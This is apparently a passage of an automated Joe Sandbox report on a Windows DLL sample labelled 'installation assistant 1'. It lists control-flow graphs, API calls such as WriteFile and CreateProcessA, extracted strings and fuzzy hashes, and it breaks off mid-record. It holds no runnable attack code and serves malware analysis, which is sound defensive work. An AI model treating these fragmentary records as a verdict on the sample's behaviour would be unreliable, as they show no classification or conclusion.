                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: 8Q
                                          • API String ID: 4237864984-4022487301
                                          • Opcode ID: 22c9245c1b7ac6d43633823e771d40559260fd7c92000cd67f4e94090fb9be63
                                          • Instruction ID: 70566220a4d38e78cbd8353cc0c6e1abafd8b28a73aaab4946b8673118ac61cc
                                          • Opcode Fuzzy Hash: 22c9245c1b7ac6d43633823e771d40559260fd7c92000cd67f4e94090fb9be63
                                          • Instruction Fuzzy Hash: 51A15932A041549FDF09DF79C9A1BAE7BB1EB07328F184259E811EFB81E7358816CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7002 6cc1c1e0-6cc1c239 call 6cc46b70 7005 6cc1c260-6cc1c269 7002->7005 7006 6cc1c2b0-6cc1c2b5 7005->7006 7007 6cc1c26b-6cc1c270 7005->7007 7008 6cc1c330-6cc1c335 7006->7008 7009 6cc1c2b7-6cc1c2bc 7006->7009 7010 6cc1c2f0-6cc1c2f5 7007->7010 7011 6cc1c272-6cc1c277 7007->7011 7016 6cc1c489-6cc1c4b9 call 6cc4b3a0 7008->7016 7017 6cc1c33b-6cc1c340 7008->7017 7012 6cc1c2c2-6cc1c2c7 7009->7012 7013 6cc1c407-6cc1c41b 7009->7013 7014 6cc1c431-6cc1c448 WriteFile 7010->7014 7015 6cc1c2fb-6cc1c300 7010->7015 7018 6cc1c372-6cc1c3df WriteFile 7011->7018 7019 6cc1c27d-6cc1c282 7011->7019 7021 6cc1c23b-6cc1c250 7012->7021 7022 6cc1c2cd-6cc1c2d2 7012->7022 7020 6cc1c41f-6cc1c42c 7013->7020 7023 6cc1c452-6cc1c47f call 6cc4b920 ReadFile 7014->7023 7015->7023 7024 6cc1c306-6cc1c30b 7015->7024 7016->7005 7026 6cc1c346-6cc1c36d 7017->7026 7027 6cc1c4be-6cc1c4c3 7017->7027 7028 6cc1c3e9-6cc1c3fd WriteFile 7018->7028 7019->7028 7029 6cc1c288-6cc1c28d 7019->7029 7020->7005 7033 6cc1c253-6cc1c258 7021->7033 7022->7005 7030 6cc1c2d4-6cc1c2e7 7022->7030 7023->7016 7024->7005 7032 6cc1c311-6cc1c32b 7024->7032 7026->7033 7027->7005 7035 6cc1c4c9-6cc1c4d7 7027->7035 7028->7013 7029->7005 7036 6cc1c28f-6cc1c2aa 7029->7036 7030->7033 7032->7020 7033->7005 7036->7033
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                          • API String ID: 0-4100612575
                                          • Opcode ID: b21a4866ef943ecad1d4f61bcce33648fcd0ac89705faf819a04bd99fa39eaa2
                                          • Instruction ID: 625e26f02112b195d7caade03ad8043ebdcc132ec24c399fc560a5da5d454c12
                                          • Opcode Fuzzy Hash: b21a4866ef943ecad1d4f61bcce33648fcd0ac89705faf819a04bd99fa39eaa2
                                          • Instruction Fuzzy Hash: 57716FB020C345AFD710DF56C480B9ABBF4FF8A708F10492EF598D6A51E775D848AB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                          • API String ID: 0-174837320
                                          • Opcode ID: 9db7de240c74486c21a9081b80abf1ba24db4f6aeae96a74443e05d1314e432d
                                          • Instruction ID: 2bfb047d7047b960abd17ec3c5e9e184484e8dbc5f3efccd5391316f0ad4988e
                                          • Opcode Fuzzy Hash: 9db7de240c74486c21a9081b80abf1ba24db4f6aeae96a74443e05d1314e432d
                                          • Instruction Fuzzy Hash: 4F4235B460D3419FC755CE2AC0A0A1ABBE1AF89314F288D1EE595C7B60E734D845DF93
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ;T55
                                          • API String ID: 0-2572755013
                                          • Opcode ID: 2a307b678bca4d269ab3f0a2cf1ea52ae47fd81f0e3b9d8141eb5260e7b0b3a7
                                          • Instruction ID: 5fe6b112a867a33c206874b31c0231c6face4ca56b8b8f1f9049f6aaab3bee7a
                                          • Opcode Fuzzy Hash: 2a307b678bca4d269ab3f0a2cf1ea52ae47fd81f0e3b9d8141eb5260e7b0b3a7
                                          • Instruction Fuzzy Hash: 0003D431645B018FC728CF29C8D0696B7F3AFD532471E8B6DC0A64BA95DB74B48ACB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7579 6cc44ff0-6cc45077 CreateProcessA 7580 6cc450ca-6cc450d3 7579->7580 7581 6cc450d5-6cc450da 7580->7581 7582 6cc450f0-6cc4510b 7580->7582 7583 6cc45080-6cc450c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6cc450dc-6cc450e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6cc450e3-6cc45118 7584->7585
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          • Opcode ID: 97b2e784ca8a37c493d59e36e5b31f03f40b2b84458e6ddb85b41856c85cd8ec
                                          • Instruction ID: 23dd320782411b4592f022933b55fb54f4e9abc5192a1b7d763f6c5f40c203c0
                                          • Opcode Fuzzy Hash: 97b2e784ca8a37c493d59e36e5b31f03f40b2b84458e6ddb85b41856c85cd8ec
                                          • Instruction Fuzzy Hash: 1831E2708093808FE740DF29D19872ABBF0EB9A318F409A1DF9D996250E7B5D589CF43

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7587 6cc5bc5e-6cc5bc7a 7588 6cc5bc80-6cc5bc82 7587->7588 7589 6cc5be39 7587->7589 7590 6cc5bca4-6cc5bcc5 7588->7590 7591 6cc5bc84-6cc5bc97 call 6cc4f9df call 6cc4f9cc call 6cc50120 7588->7591 7592 6cc5be3b-6cc5be3f 7589->7592 7593 6cc5bcc7-6cc5bcca 7590->7593 7594 6cc5bccc-6cc5bcd2 7590->7594 7607 6cc5bc9c-6cc5bc9f 7591->7607 7593->7594 7597 6cc5bcd4-6cc5bcd9 7593->7597 7594->7591 7594->7597 7599 6cc5bcdb-6cc5bce7 call 6cc5ac69 7597->7599 7600 6cc5bcea-6cc5bcfb call 6cc5be40 7597->7600 7599->7600 7608 6cc5bcfd-6cc5bcff 7600->7608 7609 6cc5bd3c-6cc5bd4e 7600->7609 7607->7592 7610 6cc5bd26-6cc5bd32 call 6cc5beb1 7608->7610 7611 6cc5bd01-6cc5bd09 7608->7611 7612 6cc5bd95-6cc5bdb7 WriteFile 7609->7612 7613 6cc5bd50-6cc5bd59 7609->7613 7623 6cc5bd37-6cc5bd3a 7610->7623 7614 6cc5bd0f-6cc5bd1c call 6cc5c25b 7611->7614 7615 6cc5bdcb-6cc5bdce 7611->7615 7617 6cc5bdc2 7612->7617 7618 6cc5bdb9-6cc5bdbf GetLastError 7612->7618 7619 6cc5bd85-6cc5bd93 call 6cc5c2c3 7613->7619 7620 6cc5bd5b-6cc5bd5e 7613->7620 7631 6cc5bd1f-6cc5bd21 7614->7631 7625 6cc5bdd1-6cc5bdd6 7615->7625 7624 6cc5bdc5-6cc5bdca 7617->7624 7618->7617 7619->7623 7626 6cc5bd75-6cc5bd83 call 6cc5c487 7620->7626 7627 6cc5bd60-6cc5bd63 7620->7627 7623->7631 7624->7615 7632 6cc5be34-6cc5be37 7625->7632 7633 6cc5bdd8-6cc5bddd 7625->7633 7626->7623 7627->7625 7634 6cc5bd65-6cc5bd73 call 6cc5c39e 7627->7634 7631->7624 7632->7592 7636 6cc5bddf-6cc5bde4 7633->7636 7637 6cc5be09-6cc5be15 7633->7637 7634->7623 7641 6cc5bde6-6cc5bdf8 call 6cc4f9cc call 6cc4f9df 7636->7641 7642 6cc5bdfd-6cc5be04 call 6cc4f9f2 7636->7642 7639 6cc5be17-6cc5be1a 7637->7639 7640 6cc5be1c-6cc5be2f call 6cc4f9cc call 6cc4f9df 7637->7640 7639->7589 7639->7640 7640->7607 7641->7607 7642->7607
                                          APIs
                                            • Part of subcall function 6CC5BEB1: GetConsoleCP.KERNEL32(?,6CC5B0D0,?), ref: 6CC5BEF9
                                          • WriteFile.KERNEL32(?,?,6CC646EC,00000000,00000000,?,00000000,00000000,6CC65AB6,00000000,00000000,?,00000000,6CC5B0D0,6CC646EC,00000000), ref: 6CC5BDAF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC646EC,6CC5B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC5BDB9
                                          • __dosmaperr.LIBCMT ref: 6CC5BDFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 251514795-4022487301
                                          • Opcode ID: 9ddcae147b070dc933bb0d1050fefbdd8d7c7226543dc9d7a279d337f095f5b3
                                          • Instruction ID: ef2e3e8d4c1ac0f1b7e7087f414416dec605afbd2db5440e365e340318e554fc
                                          • Opcode Fuzzy Hash: 9ddcae147b070dc933bb0d1050fefbdd8d7c7226543dc9d7a279d337f095f5b3
                                          • Instruction Fuzzy Hash: D6510871E00209AFEB01DFA5C850BEEBF79FF05358F940491E500ABA41F770A9358769

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7654 6cc45b90-6cc45b9c 7655 6cc45bdd 7654->7655 7656 6cc45b9e-6cc45ba9 7654->7656 7659 6cc45bdf-6cc45c57 7655->7659 7657 6cc45bbf-6cc45bcc call 6cb101f0 call 6cc50b18 7656->7657 7658 6cc45bab-6cc45bbd 7656->7658 7667 6cc45bd1-6cc45bdb 7657->7667 7658->7657 7661 6cc45c83-6cc45c89 7659->7661 7662 6cc45c59-6cc45c81 7659->7662 7662->7661 7664 6cc45c8a-6cc45d49 call 6cb12250 call 6cb12340 call 6cc49379 call 6cb0e010 call 6cc47088 7662->7664 7667->7659
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC45D31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 323602529-1866435925
                                          • Opcode ID: 81d9c7947dca1a6f5ea6e289a0ae9ce6887e527df586c32b8d2f638bf40f26bf
                                          • Instruction ID: ebf78d36f3cc35f6b256a15df16459ca83544667728a1482c8dc172b20a5cbbb
                                          • Opcode Fuzzy Hash: 81d9c7947dca1a6f5ea6e289a0ae9ce6887e527df586c32b8d2f638bf40f26bf
                                          • Instruction Fuzzy Hash: 5C5131B5A00B408FD725CF29C585B97BBF1FB48318F008A6DD8864BB91E775B909CB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7699 6cc5b925-6cc5b939 call 6cc615a2 7702 6cc5b93f-6cc5b947 7699->7702 7703 6cc5b93b-6cc5b93d 7699->7703 7704 6cc5b952-6cc5b955 7702->7704 7705 6cc5b949-6cc5b950 7702->7705 7706 6cc5b98d-6cc5b9ad call 6cc6171f 7703->7706 7708 6cc5b957-6cc5b95b 7704->7708 7709 6cc5b973-6cc5b983 call 6cc615a2 CloseHandle 7704->7709 7705->7704 7710 6cc5b95d-6cc5b971 call 6cc615a2 * 2 7705->7710 7716 6cc5b9af-6cc5b9b9 call 6cc4f9f2 7706->7716 7717 6cc5b9bb 7706->7717 7708->7709 7708->7710 7709->7703 7719 6cc5b985-6cc5b98b GetLastError 7709->7719 7710->7703 7710->7709 7721 6cc5b9bd-6cc5b9c0 7716->7721 7717->7721 7719->7706
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC6425F), ref: 6CC5B97B
                                          • GetLastError.KERNEL32(?,00000000,?,6CC6425F), ref: 6CC5B985
                                          • __dosmaperr.LIBCMT ref: 6CC5B9B0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: 93ed763a96ae1993e6f2674df5ca8c92d1f7cd79adf2ead764ff44f786e49c74
                                          • Instruction ID: b6e83518682ebf089bb6b9de8f6414af7324b42ce2c5a4740f4450ba94edd3c5
                                          • Opcode Fuzzy Hash: 93ed763a96ae1993e6f2674df5ca8c92d1f7cd79adf2ead764ff44f786e49c74
                                          • Instruction Fuzzy Hash: 06016B33A091201AD201163F99A679D7BB99FC373CFA94349E91587EC1FB60C8758294

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7944 6cc50b9c-6cc50ba7 7945 6cc50bbe-6cc50bcb 7944->7945 7946 6cc50ba9-6cc50bbc call 6cc4f9cc call 6cc50120 7944->7946 7948 6cc50c06-6cc50c0f call 6cc5ae75 7945->7948 7949 6cc50bcd-6cc50be2 call 6cc50cb9 call 6cc5873e call 6cc59c60 call 6cc5b898 7945->7949 7957 6cc50c10-6cc50c12 7946->7957 7948->7957 7963 6cc50be7-6cc50bec 7949->7963 7964 6cc50bf3-6cc50bf7 7963->7964 7965 6cc50bee-6cc50bf1 7963->7965 7964->7948 7966 6cc50bf9-6cc50c05 call 6cc547bb 7964->7966 7965->7948 7966->7948
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                          • Instruction ID: cd6ebf04cc15b0b9454adf69706d8261557ab8b7fcec472920b36eba11e8424f
                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                          • Instruction Fuzzy Hash: 41F0F432D016546AC6211A3B8C00BDB36A89F8337CF900715E861D7ED0FB70E43AC6AE
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC45AB4
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC45AF4
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID:
                                          • API String ID: 323602529-0
                                          • Opcode ID: 78d9a42763136c68a47993cf1082250630443812ddd72d9b75f7ed619de444e9
                                          • Instruction ID: 912f933ee538d411a3f322a4fad97ba63a5b343407fdccfe9a469994c4c50101
                                          • Opcode Fuzzy Hash: 78d9a42763136c68a47993cf1082250630443812ddd72d9b75f7ed619de444e9
                                          • Instruction Fuzzy Hash: 52514971101B40DBE725CF25C585BE6BBF4BB04718F448A1CD4AA4BBA1EB30B549CB81
                                          APIs
                                          • GetLastError.KERNEL32(6CC76DD8,0000000C), ref: 6CC4EF52
                                          • ExitThread.KERNEL32 ref: 6CC4EF59
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: ErrorExitLastThread
                                          • String ID:
                                          • API String ID: 1611280651-0
                                          • Opcode ID: a6ed40098680510ee48b3ce2d5a238c72f6f74ee93cfce15c667a4689dcd27d1
                                          • Instruction ID: eab0ed3468868dd31315ccf94700c1acf95a2778b378e20700e54970928b903a
                                          • Opcode Fuzzy Hash: a6ed40098680510ee48b3ce2d5a238c72f6f74ee93cfce15c667a4689dcd27d1
                                          • Instruction Fuzzy Hash: E8F0C2B1A00600AFEB05EFB0C809AAE7B74FF41319F148689E40597B51EB315925CFA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 2aa377d7a52d44743b1c6df9b755c9c5eb19779e0932ecd85158fd8bb73b244b
                                          • Instruction ID: e7644ae9e2fb7c9c1d8bac6038e453955523d0580f4f54414e6fe24d2868ff2c
                                          • Opcode Fuzzy Hash: 2aa377d7a52d44743b1c6df9b755c9c5eb19779e0932ecd85158fd8bb73b244b
                                          • Instruction Fuzzy Hash: 26113A71A0420EAFCB05DF59E94599B7BF8EF49318F144069F809EB301E671E921CBA9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                          • Instruction ID: 057d04506df4d4134155a3724ea05c68865dfc63d69f8bbd4cc4ea91a7541fc1
                                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                          • Instruction Fuzzy Hash: D6012C72C01159AFCF02DFA98D40AEE7FB5AB08354F144165ED64E26A0F7318A25DB91
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,6CC64115,?,?,00000000,?,6CC64115,00000000,0000000C), ref: 6CC64474
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 021d27ae7e4559791e059c8a79b409f0be63205483d389e0f2f5a480034b4043
                                          • Instruction ID: 2e5a23b9cc8afac8b5ea9dfac73040e34657e7f752c6642baa913eb33a011d96
